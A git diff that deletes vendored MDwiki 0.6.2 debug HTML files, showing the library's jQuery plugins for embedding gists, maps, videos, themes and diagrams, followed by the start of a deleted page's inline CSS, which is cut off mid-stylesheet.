-        once: function() {
-            $.md.linkGimmick(this, 'gist', gist);
-        }
-    };
-    $.md.registerGimmick(gistGimmick);
-
-    function gist($links, opt, href) {
-        $().lazygist('init');
-        return $links.each(function(i,link) {
-            var $link = $(link);
-            var gistDiv = $('<div class="gist_here" data-id="' + href + '" />');
-            $link.replaceWith(gistDiv);
-            gistDiv.lazygist({
-                // we dont want a specific file so modify the url template
-                url_template: 'https://gist.github.com/{id}.js?'
-            });
-        });
-    }
-}(jQuery));
-
-
- /**
- * Lazygist v0.2pre
- *
- * a jQuery plugin that will lazy load your gists.
- *
- * since jQuery 1.7.2
- * https://github.com/tammo/jquery-lazy-gist
- *
- * Copyright, Tammo Pape
- * http://tammopape.de
- *
- * Licensed under the MIT license.
- */
-
-(function( $, window, document, undefined ){
-    "use strict";
-
-    //
-    // note:
-    // this plugin is not stateful
-    // and will not communicate with own instances at different elements
-    //
-
-    var pluginName = "lazygist",
-    version = "0.2pre",
-
-    defaults = {
-        // adding the ?file parameter to choose a file
-        'url_template': 'https://gist.github.com/{id}.js?file={file}',
-
-        // if these are strings, the attributes will be read from the element
-        'id': 'data-id',
-        'file': 'data-file'
-    },
-
-    options,
-
-    // will be replaced
-    /*jshint -W060 */
-    originwrite = document.write,
-
-    // stylesheet urls found in document.write calls
-    // they are cached to write them once to the document,
-    // not three times for three gists
-    stylesheets = [],
-
-    // cache gist-ids to know which are already appended to the dom
-    ids_dom = [],
-
-    // remember gist-ids if their javascript is already loaded
-    ids_ajax = [],
-
-    methods = {
-
-        /**
-         * Standard init function
-         * No magic here
-         */
-        init : function( options_input ){
-
-            // default options are default
-            options = $.extend({}, defaults, options_input);
-
-            // can be reset
-            /*jshint -W061 */
-            document.write = _write;
-
-            $.each(options, function(index, value) {
-                if(typeof value !== 'string') {
-                    throw new TypeError(value + ' (' + (typeof value) + ') is not a string');
-                }
-            });
-
-            return this.lazygist('load');
-        },
-
-        /**
-         * Load the gists
-         */
-        load : function() {
-            // (1) iterate over gist anchors
-            // (2) append the gist-html through the new document.write func (see _write)
-
-            // (1)
-            return this.filter('[' + options.id + ']').each(function(){
-
-                var id = $(this).attr(options.id),
-                    file = $(this).attr(options.file),
-                    src;
-
-                if( id !== undefined ) {
-
-                    if( $.inArray(id, ids_ajax) !== -1 ) {
-                        // just do nothin, if gist is already ajaxed
-                        return;
-                    }
-
-                    ids_ajax.push(id);
-
-                    src = options.url_template.replace(/\{id\}/g, id).replace(/\{file\}/g, file);
-
-                    // (2) this will trigger our _write function
-                    $.getScript(src, function() {
-                    });
-                }
-            });
-        },
-
-        /**
-         * Just reset the write function
-         */
-        reset_write: function() {
-            document.write = originwrite;
-
-            return this;
-        }
-    };
-
-    /**
-     * private special document.write function
-     *
-     * Filters the css file from github.com to add it to the head - once -
-     *
-     * It has a fallback to keep flexibility with other scripts as high as possible
-     * (create a ticket if it messes things up!)
-     *
-     * Keep in mind, that a call to this function happens after
-     * an ajax call by jQuery. One *cannot* know which gist-anchor
-     * to use. You can only read the id from the content.
-     */
-    function _write( content ) {
-
-        var expression, // for regexp results
-            href, // from the url
-            id; // from the content
-
-        if( content.indexOf( 'rel="stylesheet"' ) !== -1 ) {
-            href = $(content).attr('href');
-
-            // check if stylesheet is already inserted
-            if ( $.inArray(href, stylesheets) === -1 ) {
-
-                $('head').append(content);
-                stylesheets.push(href);
-            }
-
-        } else if( content.indexOf( 'id="gist' ) !== -1 ) {
-            expression = /gist([\d]{1,})/g.exec(content);
-            id = expression[1];
-
-            if( id !== undefined ) {
-
-                // test if id is already loaded
-                if( $.inArray(id, ids_dom) !== -1 ) {
-                    // just do nothin, if gist is already attached to the dom
-                    return;
-                }
-
-                ids_dom.push(id);
-
-                $('.gist_here[data-id=' + id + ']').append(content);
-            }
-        } else {
-            // this is a fallback for interoperability
-            originwrite.apply( document, arguments );
-        }
-    }
-
-    // method invocation - from jQuery.com
-    $.fn[pluginName] = function( method ) {
-
-        if ( methods[method] ) {
-            return methods[ method ].apply( this, Array.prototype.slice.call( arguments, 1 ));
-
-        } else if ( typeof method === 'object' || ! method ) {
-            return methods.init.apply( this, arguments );
-
-        } else {
-            $.error( 'Method ' +  method + ' does not exist on jQuery.lazygist' );
-        }
-    };
-
-    // expose version for your interest
-    $.fn[pluginName].version = version;
-
-})(jQuery, window, document);
-
-// ugly, but the google loader requires the callback fn
-// to be in the global scope
-var googlemapsLoadDone;
-
-function googlemapsReady() {
-    googlemapsLoadDone.resolve();
-}
-
-(function($) {
-    //'use strict';
-    var scripturl = 'http://maps.google.com/maps/api/js?sensor=false&callback=googlemapsReady';
-
-    function googlemaps($links, opt, text) {
-        var $maps_links = $links;
-        var counter = (new Date()).getTime ();
-        return $maps_links.each(function(i,e) {
-            var $link = $(e);
-            var default_options = {
-                zoom: 11,
-                marker: true,
-                scrollwheel: false,
-                maptype: 'roadmap'
-            };
-            var options = $.extend({}, default_options, opt);
-            if (options.address === undefined) {
-                options.address = $link.attr ('href');
-            }
-            var div_id = 'google-map-' + Math.floor (Math.random() * 100000);
-            var $mapsdiv = $('<div class="md-external md-external-nowidth" id="' + div_id + '"/>');
-            /* TODO height & width must be set AFTER the theme script went through
-            implement an on event, maybe?
-            if (options["width"] !== undefined) {
-                $mapsdiv.css('width', options["width"] + "px");
-                options["width"] = null;
-            }
-            if (options["height"] !== undefined) {
-                $mapsdiv.css('height', options["height"] + "px");
-                options["height"] = null;
-            }
-            */
-            $link.replaceWith ($mapsdiv);
-            // the div is already put into the site and will be formated,
-            // we can now run async
-            set_map (options, div_id);
-        });
-    }
-    function set_map(opt, div_id) {
-
-        // google uses rather complicated mapnames, we transform our simple ones
-        var mt = opt.maptype.toUpperCase ();
-        opt.mapTypeId = google.maps.MapTypeId[mt];
-        var geocoder = new google.maps.Geocoder ();
-
-        // geocode performs address to coordinate transformation
-        geocoder.geocode ({ address: opt.address }, function (result, status) {
-            if (status !== 'OK') {
-                return;
-            }
-
-            // add the retrieved coords to the options object
-            var coords = result[0].geometry.location;
-
-            var options = $.extend({}, opt, { center: coords  });
-            var gmap = new google.maps.Map(document.getElementById(div_id), options);
-            if (options.marker === true) {
-                var marker = new google.maps.Marker ({ position: coords, map : gmap});
-            }
-        });
-    }
-
-    var googleMapsGimmick = {
-        name: 'googlemaps',
-        version: $.md.version,
-        once: function() {
-            googlemapsLoadDone = $.Deferred();
-
-            // register the gimmick:googlemaps identifier
-            $.md.linkGimmick(this, 'googlemaps', googlemaps);
-
-            // load the googlemaps js from the google server
-            $.md.registerScript(this, scripturl, {
-                license: 'EXCEPTION',
-                loadstage: 'skel_ready',
-                finishstage: 'bootstrap'
-            });
-
-            $.md.stage('bootstrap').subscribe(function(done) {
-                // defer the pregimmick phase until the google script fully loaded
-                if ($.md.triggerIsActive('googlemaps')) {
-                    googlemapsLoadDone.done(function() {
-                        done();
-                    });
-                } else {
-                    // immediately return as there will never a load success
-                    done();
-                }
-            });
-        }
-    };
-    $.md.registerGimmick(googleMapsGimmick);
-}(jQuery));
-
-(function($) {
-    var highlightGimmick = {
-        name: 'highlight',
-        load: function() {
-            $.md.stage('gimmick').subscribe(function(done) {
-                highlight();
-                done();
-            });
-        }
-    };
-    $.md.registerGimmick(highlightGimmick);
-
-
-    function highlight () {
-        // marked adds lang-ruby, lang-csharp etc to the <code> block like in GFM
-        var $codeblocks = $('pre code[class^=lang-]');
-        return $codeblocks.each(function() {
-            var $this = $(this);
-            var classes = $this.attr('class');
-            // TODO check for other classes and only find the lang- one
-            // highlight doesnt want a lang- prefix
-            var lang = classes.substring(5);
-            $this.removeClass(classes);
-            $this.addClass(lang);
-            var x = hljs.highlightBlock($this[0]);
-        });
-    }
-
-}(jQuery));
-
-(function($) {
-    'use strict';
-    var iframeGimmick= {
-        name: 'iframe',
-        version: $.md.version,
-        once: function() {
-            $.md.linkGimmick(this, 'iframe', create_iframe);
-        }
-    };
-    $.md.registerGimmick(iframeGimmick);
-
-    function create_iframe($links, opt, text) {
-        return $links.each (function (i, link){
-            var $link = $(link);
-            var href = $link.attr('href');
-            var $iframe = $('<iframe class="col-md-12" style="border: 0px solid red; height: 650px;"></iframe>');
-            $iframe.attr('src', href);
-            $link.replaceWith($iframe);
-
-            if (opt.width)
-                $iframe.css('width', opt.width);
-            if (opt.height)
-                $iframe.css('height', opt.height);
-            else {
-                var updateSizeFn = function () {
-                    var offset = $iframe.offset();
-                    var winHeight = $(window).height();
-                    var newHeight = winHeight - offset.top - 5;
-                    $iframe.height(newHeight);
-                };
-
-                $iframe.load(function(done) {
-                    updateSizeFn();
-                });
-
-                $(window).resize(function () {
-                    updateSizeFn();
-                });
-            }
-
-        });
-    }
-}(jQuery));
-
-(function($) {
-    var mathGimmick = {
-        name: 'math',
-        once: function() {
-            $.md.linkGimmick(this, 'math', load_mathjax);
-        }
-    };
-    $.md.registerGimmick(mathGimmick);
-
-    function load_mathjax($links, opt, ref) {
-        $links.remove();
-        var script = document.createElement('script');
-        script.type = 'text/javascript';
-        script.src  = $.md.prepareLink('cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML', { forceHTTP: true });
-        document.getElementsByTagName('head')[0].appendChild(script);
-    }
-
-}(jQuery));
-
-(function($) {
-    'use strict';
-
-    var themes = [
-        { name: 'bootstrap', url: 'netdna.bootstrapcdn.com/bootstrap/3.0.0/css/bootstrap.min.css' },
-        { name: 'amelia', url: 'netdna.bootstrapcdn.com/bootswatch/3.0.0/amelia/bootstrap.min.css' },
-        { name: 'cerulean', url: 'netdna.bootstrapcdn.com/bootswatch/3.0.0/cerulean/bootstrap.min.css' },
-        { name: 'cosmo', url: 'netdna.bootstrapcdn.com/bootswatch/3.0.0/cosmo/bootstrap.min.css' },
-        { name: 'cyborg', url: 'netdna.bootstrapcdn.com/bootswatch/3.0.0/cyborg/bootstrap.min.css' },
-        { name: 'flatly', url: 'netdna.bootstrapcdn.com/bootswatch/3.0.0/flatly/bootstrap.min.css' },
-        { name: 'journal', url: 'netdna.bootstrapcdn.com/bootswatch/3.0.0/journal/bootstrap.min.css' },
-        { name: 'readable', url: 'netdna.bootstrapcdn.com/bootswatch/3.0.0/readable/bootstrap.min.css' },
-        { name: 'simplex', url: 'netdna.bootstrapcdn.com/bootswatch/3.0.0/simplex/bootstrap.min.css' },
-        { name: 'slate', url: 'netdna.bootstrapcdn.com/bootswatch/3.0.0/slate/bootstrap.min.css' },
-        { name: 'spacelab', url: 'netdna.bootstrapcdn.com/bootswatch/3.0.0/spacelab/bootstrap.min.css' },
-        { name: 'united', url: 'netdna.bootstrapcdn.com/bootswatch/3.0.0/united/bootstrap.min.css' },
-        { name: 'yeti', url: 'netdna.bootstrapcdn.com/bootswatch/3.0.2/yeti/bootstrap.min.css' }
-    ];
-    var useChooser = false;
-    var themeChooserGimmick = {
-        name: 'Themes',
-        version: $.md.version,
-        once: function() {
-            $.md.linkGimmick(this, 'themechooser', themechooser, 'skel_ready');
-            $.md.linkGimmick(this, 'theme', apply_theme);
-
-        }
-    };
-    $.md.registerGimmick(themeChooserGimmick);
-
-    var log = $.md.getLogger();
-
-    var set_theme = function(theme) {
-        theme.inverse = theme.inverse || false;
-
-        if (theme.url === undefined) {
-            if (!theme.name) {
-                log.error('Theme name must be given!');
-                return;
-            }
-            var saved_theme = themes.filter(function(t) {
-                return t.name === theme.name;
-            })[0];
-            if (!saved_theme) {
-                log.error('Theme ' + name + ' not found, removing link')    ;
-                return;
-            }
-            theme = $.extend(theme, saved_theme);
-        }
-
-
-        $('link[rel=stylesheet][href*="netdna.bootstrapcdn.com"]')
-            .remove();
-
-        // slim instance has no bootstrap hardcoded in
-        var has_default_bootstrap_css = $('style[id*=bootstrap]').length > 0;
-
-        if (theme.name !== 'bootstrap' || !has_default_bootstrap_css) {
-            // in devel & fat version the style is inlined, remove it
-            $('style[id*=bootstrap]').remove();
-
-            $('<link rel="stylesheet" type="text/css">')
-                .attr('href', $.md.prepareLink(theme.url))
-                .appendTo('head');
-        }
-
-        if (theme.inverse === true) {
-            $('#md-main-navbar').removeClass ('navbar-default');
-            $('#md-main-navbar').addClass ('navbar-inverse');
-        } else {
-            $('#md-main-navbar').addClass ('navbar-default');
-            $('#md-main-navbar').removeClass ('navbar-inverse');
-        }
-    };
-
-    var apply_theme = function($links, opt, text) {
-        opt.name = opt.name || text;
-        $links.each(function(i, link) {
-            $.md.stage('postgimmick').subscribe(function(done) {
-                var $link = $(link);
-
-                // only set a theme if no theme from the chooser is selected,
-                // or if the chooser isn't enabled
-                if (window.localStorage.theme === undefined || !useChooser) {
-                    set_theme(opt);
-                }
-
-                done();
-            });
-        });
-        $links.remove();
-    };
-
-    var themechooser = function($links, opt, text) {
-
-        useChooser = true;
-        $.md.stage('bootstrap').subscribe(function(done) {
-            restore_theme(opt);
-            done();
-        });
-
-        return $links.each(function(i, e) {
-            var $this = $(e);
-            var $chooser = $('<a href=""></a><ul></ul>'
-            );
-            $chooser.eq(0).text(text);
-
-            $.each(themes, function(i, theme) {
-                var $li = $('<li></li>');
-                $chooser.eq(1).append($li);
-                var $a = $('<a/>')
-                    .text(theme.name)
-                    .attr('href', '')
-                    .click(function(ev) {
-                        ev.preventDefault();
-                        window.localStorage.theme = theme.name;
-                        window.location.reload();
-                    })
-                    .appendTo($li);
-            });
-
-            $chooser.eq(1).append('<li class="divider" />');
-            var $li = $('<li/>');
-            var $a_use_default = $('<a>Use default</a>');
-            $a_use_default.click(function(ev) {
-                ev.preventDefault();
-                window.localStorage.removeItem('theme');
-                window.location.reload();
-            });
-            $li.append($a_use_default);
-            $chooser.eq(1).append($li);
-
-            $chooser.eq(1).append('<li class="divider" />');
-            $chooser.eq(1).append('<li><a href="http://www.bootswatch.com">Powered by Bootswatch</a></li>');
-            $this.replaceWith($chooser);
-        });
-    };
-
-    var restore_theme = function(opt) {
-        if (window.localStorage.theme) {
-            opt = $.extend({ name: window.localStorage.theme }, opt);
-            set_theme(opt);
-        }
-    };
-}(jQuery));
-
-(function($) {
-    //'use strict';
-    // no license information given in the widget.js -> OTHER
-    var widgetHref = $.md.prepareLink('platform.twitter.com/widgets.js');
-    var twitterscript = '!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="' + widgetHref + '";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");';
-    var twitterGimmick = {
-        name: 'TwitterGimmick',
-        version: $.md.version,
-        once: function() {
-            $.md.linkGimmick(this, 'twitterfollow', twitterfollow);
-
-            $.md.registerScript(this, twitterscript, {
-                license: 'EXCEPTION',
-                loadstage: 'postgimmick',
-                finishstage: 'all_ready'
-            });
-
-        }
-    };
-    $.md.registerGimmick(twitterGimmick);
-
-	var twitterfollow = function($links, opt, text) {
-		return $links.each(function(i, link) {
-			var $link = $(link);
-			var user;
-			var href = $link.attr('href');
-			if (href.indexOf ('twitter.com') <= 0) {
-				user = $link.attr('href');
-				href = $.md.prepareLink('twitter.com/' + user);
-			}
-			else {
-				return;
-			}
-			// remove the leading @ if given
-			if (user[0] === '@') {
-				user = user.substring(1);
-			}
-			var twitter_src = $('<a href="' + href + '" class="twitter-follow-button" data-show-count="false" data-lang="en" data-show-screen-name="false">'+ '@' + user + '</a>');
-			$link.replaceWith (twitter_src);
-		});
-    };
-}(jQuery));
-
-(function($) {
-    //'use strict';
-    var youtubeGimmick = {
-        name: 'youtube',
-        load: function() {
-            $.md.stage('gimmick').subscribe(function(done) {
-                youtubeLinkToIframe();
-                done();
-            });
-        }
-    } ;
-    $.md.registerGimmick(youtubeGimmick);
-
-    function youtubeLinkToIframe() {
-        var $youtube_links = $('a[href*=youtube\\.com]:empty, a[href*=youtu\\.be]:empty');
-
-        $youtube_links.each(function() {
-            var $this = $(this);
-            var href = $this.attr('href');
-            if (href !== undefined) {
-                // extract the v parameter from youtube
-                var exp = /.*(?:youtu.be\/|v\/|u\/\w\/|embed\/|watch\?v=)([^#\&\?]*).*/;
-                var m = href.match(exp);
-
-                if (m && m[1].length === 11) {
-                    // insert the iframe
-                    var short_handle = m[1];
-                    var frame = $('<iframe class="md-external" frameborder="0" allowfullscreen></iframe>');
-                    frame.attr('src', 'http://youtube.com/embed/' + short_handle);
-                    // remove the a tag
-                    $this.replaceWith(frame);
-
-                }
-            }
-        });
-    }
-}(jQuery));
-
-(function($) {
-    'use strict';
-    function yuml($link, opt, text) {
-        var default_options = {
-            type: 'class',  /* { class, activity, usecase } */
-            style: 'plain', /* { plain, scruffy } */
-            direction: 'LR',      /* LR, TB, RL */
-            scale: '100'
-        };
-        var options = $.extend ({}, default_options, opt);
-
-        return $link.each(function(i,e) {
-
-            var $this = $(e);
-            var url = 'http://yuml.me/diagram/';
-            var data = $this.attr('href');
-            var title = $this.attr('title');
-
-            title = (title ? title : '');
-
-            /* `FOOBAR´ => (FOOBAR) */
-            data = data.replace( new RegExp('`', 'g'), '(' ).replace( new RegExp('´', 'g'), ')' );
-
-            url += options.style + ';dir:' + options.direction + ';scale:' + options.scale + '/' + options.type + '/' + data;
-
-            var $img = $('<img src="' + url + '" title="' + title + '" alt="' + title + '">');
-
-            $this.replaceWith($img);
-        });
-    }
-    var yumlGimmick = {
-        name: 'yuml',
-        version: $.md.version,
-        once: function() {
-            $.md.linkGimmick(this, 'yuml', yuml);
-            $.md.registerScript(this, '', {
-                license: 'LGPL',
-                loadstage: 'postgimmick',
-                finishstage: 'all_ready'
-            });
-        }
-    };
-    $.md.registerGimmick(yumlGimmick);
-
-}(jQuery));
-</script>
-<!-- END dist/MDwiki.js -->
-<script type="text/javascript">$.md.logThreshold = $.md.loglevel.DEBUG;</script>
-</head>
-<body>
-    <noscript>
-        This website requires Javascript to be enabled. Please turn on Javascript
-        and reload the page.
-    </noscript>
-
-    <div id="md-all">
-    </div>
-</body>
-</html>
diff --git a/IntroClassFiles/mdwiki-0.6.2/mdwiki-debug_1.html b/IntroClassFiles/mdwiki-0.6.2/mdwiki-debug_1.html
deleted file mode 100755
index 7054fc9a..00000000
--- a/IntroClassFiles/mdwiki-0.6.2/mdwiki-debug_1.html
+++ /dev/null
@@ -1,4260 +0,0 @@
-<!DOCTYPE html>
-<html>
-<!--
-   This is MDwiki v0.6.2
-   (C) 2013 by Timo Dörr and contributors. This software is licensed
-   under the terms of the GNU GPLv3 with additional terms applied.
-   See https://github.com/Dynalon/mdwiki/blob/master/LICENSE.txt for more detail.
-   See http://github.com/Dynalon/mdwiki for a copy of the source code.
--->
-<head>
-    <title>MDwiki</title>
-    <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <meta name="fragment" content="!">
-    <link rel="shortcut icon" type="image/x-icon" href="favicon.png" />
-    <meta charset="UTF-8">
-    <style type="text/css">
-    /* hide the main content while we assemble everything */
-    .md-hidden-load { display: none; }
-
-    .anchor-highlight {
-        font-size: 0.7em;
-        margin-left: 0.25em;
-    }
-    /* for pageContentMenu */
-    #md-page-menu {
-            position: static;
-    }
-    #md-page-menu a.active {
-        /* background-color: rgba(0, 0, 0, 0.01); */
-        font-weight: bold;
-        padding-left: 6px;
-
-    }
-    @media (min-width: 992px) {
-        #md-page-menu.affix {
-            position: fixed;
-        }
-    }
-    @media (min-width: 768px) {
-        .md-float-left .col-sm-8, .md-float-right .col-sm-8 {
-            max-width: 66.67%;
-        }
-        .md-float-left .col-sm-4, .md-float-right .col-sm-4  {
-            max-width: 33.33%;
-        }
-        .md-float-left .col-sm-2, .md-float-right .col-sm-2 {
-            max-width: 16.67%;
-        }
-
-    }
-    @media (max-width: 992px) {
-        a.forkmeongithub {
-            display: none;
-        }
-    }
-    @media (max-width: 768px) {
-        /* don't use floating for smaller screens */
-        .md-float-left .col-sm-8, .md-float-left .col-sm-4, .md-float-left .col-sm-2 {
-            width: 100%;
-            max-width: !important;
-            min-width: 100%;
-        }
-        .md-float-right .col-sm-8, .md-float-right .col-sm-4, .md-float-right .col-sm-2 {
-            width: 100%;
-            max-width: !important;
-            min-width: 100%;
-        }
-    }
-
-    .md-floatenv .md-text {
-        /* md-text is not of md-col-* but needs the spacing */
-        margin-left: 15px;
-        margin-right: 15px;
-    }
-
-    /* float images */
-    .md-float-left .col-sm-8, .md-float-left .col-sm-4, .md-float-left .col-sm-2 {
-        width: auto;
-    }
-    .md-float-right .col-sm-8, .md-float-right .col-sm-4, .md-float-right .col-sm-2 {
-        float: right !important;
-        width: auto;
-    }
-    #md-all .md-copyright-footer {
-        background-color: !important;
-        font-size: smaller;
-        padding: 1em;
-    }
-    </style>
-
-<!-- START extlib/css/highlight.github.css -->
-<style id="style:extlib/css/highlight.github.css">pre code{display:block;padding:.5em;color:#333;background:#f8f8ff}pre .comment,pre .template_comment,pre .diff .header,pre .javadoc{color:#998;font-style:italic}pre .keyword,pre .css .rule .keyword,pre .winutils,pre .javascript .title,pre .nginx .title,pre .subst,pre .request,pre .status{color:#333;font-weight:bold}pre .number,pre .hexcolor,pre .ruby .constant{color:#099}pre .string,pre .tag .value,pre .phpdoc,pre .tex .formula{color:#d14}pre .title,pre .id{color:#900;font-weight:bold}pre .javascript .title,pre .lisp .title,pre .clojure .title,pre .subst{font-weight:normal}pre .class .title,pre .haskell .type,pre .vhdl .literal,pre .tex .command{color:#458;font-weight:bold}pre .tag,pre .tag .title,pre .rules .property,pre .django .tag .keyword{color:#000080;font-weight:normal}pre .attribute,pre .variable,pre .lisp .body{color:#008080}pre .regexp{color:#009926}pre .class{color:#458;font-weight:bold}pre .symbol,pre .ruby .symbol .string,pre .lisp .keyword,pre .tex .special,pre .prompt{color:#990073}pre .built_in,pre .lisp .title,pre .clojure .built_in{color:#0086b3}pre .preprocessor,pre .pi,pre .doctype,pre .shebang,pre .cdata{color:#999;font-weight:bold}pre .deletion{background:#fdd}pre .addition{background:#dfd}pre .diff .change{background:#0086b3}pre .chunk{color:#aaa}</style><!-- END extlib/css/highlight.github.css -->
-<!-- START extlib/css/bootstrap-3.0.0.min.css -->
-<style id="style:extlib/css/bootstrap-3.0.0.min.css">/*!
- * Bootstrap v3.0.0
- *
- * Copyright 2013 Twitter, Inc
- * Licensed under the Apache License v2.0
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Designed and built with all the love in the world by @mdo and @fat.
- *//*! normalize.css v2.1.0 | MIT License | git.io/normalize */article,aside,details,figcaption,figure,footer,header,hgroup,main,nav,section,summary{display:block}audio,canvas,video{display:inline-block}audio:not([controls]){display:none;height:0}[hidden]{display:none}html{font-family:sans-serif;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}body{margin:0}a:focus{outline:thin dotted}a:active,a:hover{outline:0}h1{margin:.67em 0;font-size:2em}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:bold}dfn{font-style:italic}hr{height:0;-moz-box-sizing:content-box;box-sizing:content-box}mark{color:#000;background:#ff0}code,kbd,pre,samp{font-family:monospace,serif;font-size:1em}pre{white-space:pre-wrap}q{quotes:"\201C" "\201D" "\2018" "\2019"}small{font-size:80%}sub,sup{position:relative;font-size:75%;line-height:0;vertical-align:baseline}sup{top:-0.5em}sub{bottom:-0.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:0}fieldset{padding:.35em .625em .75em;margin:0 2px;border:1px solid #c0c0c0}legend{padding:0;border:0}button,input,select,textarea{margin:0;font-family:inherit;font-size:100%}button,input{line-height:normal}button,select{text-transform:none}button,html input[type="button"],input[type="reset"],input[type="submit"]{cursor:pointer;-webkit-appearance:button}button[disabled],html input[disabled]{cursor:default}input[type="checkbox"],input[type="radio"]{padding:0;box-sizing:border-box}input[type="search"]{-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-appearance:textfield}input[type="search"]::-webkit-search-cancel-button,input[type="search"]::-webkit-search-decoration{-webkit-appearance:none}button::-moz-focus-inner,input::-moz-focus-inner{padding:0;border:0}textarea{overflow:auto;vertical-align:top}table{border-collapse:collapse;border-spacing:0}@media print{*{color:#000!important;text-shadow:none!important;background:transparent!important;box-shadow:none!important}a,a:visited{text-decoration:underline}a[href]:after{content:" (" attr(href) ")"}abbr[title]:after{content:" (" attr(title) ")"}.ir a:after,a[href^="javascript:"]:after,a[href^="#"]:after{content:""}pre,blockquote{border:1px solid #999;page-break-inside:avoid}thead{display:table-header-group}tr,img{page-break-inside:avoid}img{max-width:100%!important}@page{margin:2cm .5cm}p,h2,h3{orphans:3;widows:3}h2,h3{page-break-after:avoid}.navbar{display:none}.table td,.table th{background-color:#fff!important}.btn>.caret,.dropup>.btn>.caret{border-top-color:#000!important}.label{border:1px solid #000}.table{border-collapse:collapse!important}.table-bordered th,.table-bordered td{border:1px solid #ddd!important}}*,*:before,*:after{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}html{font-size:62.5%;-webkit-tap-highlight-color:rgba(0,0,0,0)}body{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;line-height:1.428571429;color:#333;background-color:#fff}input,button,select,textarea{font-family:inherit;font-size:inherit;line-height:inherit}button,input,select[multiple],textarea{background-image:none}a{color:#428bca;text-decoration:none}a:hover,a:focus{color:#2a6496;text-decoration:underline}a:focus{outline:thin dotted #333;outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}img{vertical-align:middle}.img-responsive{display:block;height:auto;max-width:100%}.img-rounded{border-radius:6px}.img-thumbnail{display:inline-block;height:auto;max-width:100%;padding:4px;line-height:1.428571429;background-color:#fff;border:1px solid #ddd;border-radius:4px;-webkit-transition:all .2s ease-in-out;transition:all .2s ease-in-out}.img-circle{border-radius:50%}hr{margin-top:20px;margin-bottom:20px;border:0;border-top:1px solid #eee}.sr-only{position:absolute;width:1px;height:1px;padding:0;margin:-1px;overflow:hidden;clip:rect(0 0 0 0);border:0}p{margin:0 0 10px}.lead{margin-bottom:20px;font-size:16.099999999999998px;font-weight:200;line-height:1.4}@media(min-width:768px){.lead{font-size:21px}}small{font-size:85%}cite{font-style:normal}.text-muted{color:#999}.text-primary{color:#428bca}.text-warning{color:#c09853}.text-danger{color:#b94a48}.text-success{color:#468847}.text-info{color:#3a87ad}.text-left{text-align:left}.text-right{text-align:right}.text-center{text-align:center}h1,h2,h3,h4,h5,h6,.h1,.h2,.h3,.h4,.h5,.h6{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;font-weight:500;line-height:1.1}h1 small,h2 small,h3 small,h4 small,h5 small,h6 small,.h1 small,.h2 small,.h3 small,.h4 small,.h5 small,.h6 small{font-weight:normal;line-height:1;color:#999}h1,h2,h3{margin-top:20px;margin-bottom:10px}h4,h5,h6{margin-top:10px;margin-bottom:10px}h1,.h1{font-size:36px}h2,.h2{font-size:30px}h3,.h3{font-size:24px}h4,.h4{font-size:18px}h5,.h5{font-size:14px}h6,.h6{font-size:12px}h1 small,.h1 small{font-size:24px}h2 small,.h2 small{font-size:18px}h3 small,.h3 small,h4 small,.h4 small{font-size:14px}.page-header{padding-bottom:9px;margin:40px 0 20px;border-bottom:1px solid #eee}ul,ol{margin-top:0;margin-bottom:10px}ul ul,ol ul,ul ol,ol ol{margin-bottom:0}.list-unstyled{padding-left:0;list-style:none}.list-inline{padding-left:0;list-style:none}.list-inline>li{display:inline-block;padding-right:5px;padding-left:5px}dl{margin-bottom:20px}dt,dd{line-height:1.428571429}dt{font-weight:bold}dd{margin-left:0}@media(min-width:768px){.dl-horizontal dt{float:left;width:160px;overflow:hidden;clear:left;text-align:right;text-overflow:ellipsis;white-space:nowrap}.dl-horizontal dd{margin-left:180px}.dl-horizontal dd:before,.dl-horizontal dd:after{display:table;content:" "}.dl-horizontal dd:after{clear:both}.dl-horizontal dd:before,.dl-horizontal dd:after{display:table;content:" "}.dl-horizontal dd:after{clear:both}}abbr[title],abbr[data-original-title]{cursor:help;border-bottom:1px dotted #999}abbr.initialism{font-size:90%;text-transform:uppercase}blockquote{padding:10px 20px;margin:0 0 20px;border-left:5px solid #eee}blockquote p{font-size:17.5px;font-weight:300;line-height:1.25}blockquote p:last-child{margin-bottom:0}blockquote small{display:block;line-height:1.428571429;color:#999}blockquote small:before{content:'\2014 \00A0'}blockquote.pull-right{padding-right:15px;padding-left:0;border-right:5px solid #eee;border-left:0}blockquote.pull-right p,blockquote.pull-right small{text-align:right}blockquote.pull-right small:before{content:''}blockquote.pull-right small:after{content:'\00A0 \2014'}q:before,q:after,blockquote:before,blockquote:after{content:""}address{display:block;margin-bottom:20px;font-style:normal;line-height:1.428571429}code,pre{font-family:Monaco,Menlo,Consolas,"Courier New",monospace}code{padding:2px 4px;font-size:90%;color:#c7254e;white-space:nowrap;background-color:#f9f2f4;border-radius:4px}pre{display:block;padding:9.5px;margin:0 0 10px;font-size:13px;line-height:1.428571429;color:#333;word-break:break-all;word-wrap:break-word;background-color:#f5f5f5;border:1px solid #ccc;border-radius:4px}pre.prettyprint{margin-bottom:20px}pre code{padding:0;font-size:inherit;color:inherit;white-space:pre-wrap;background-color:transparent;border:0}.pre-scrollable{max-height:340px;overflow-y:scroll}.container{padding-right:15px;padding-left:15px;margin-right:auto;margin-left:auto}.container:before,.container:after{display:table;content:" "}.container:after{clear:both}.container:before,.container:after{display:table;content:" "}.container:after{clear:both}.row{margin-right:-15px;margin-left:-15px}.row:before,.row:after{display:table;content:" "}.row:after{clear:both}.row:before,.row:after{display:table;content:" 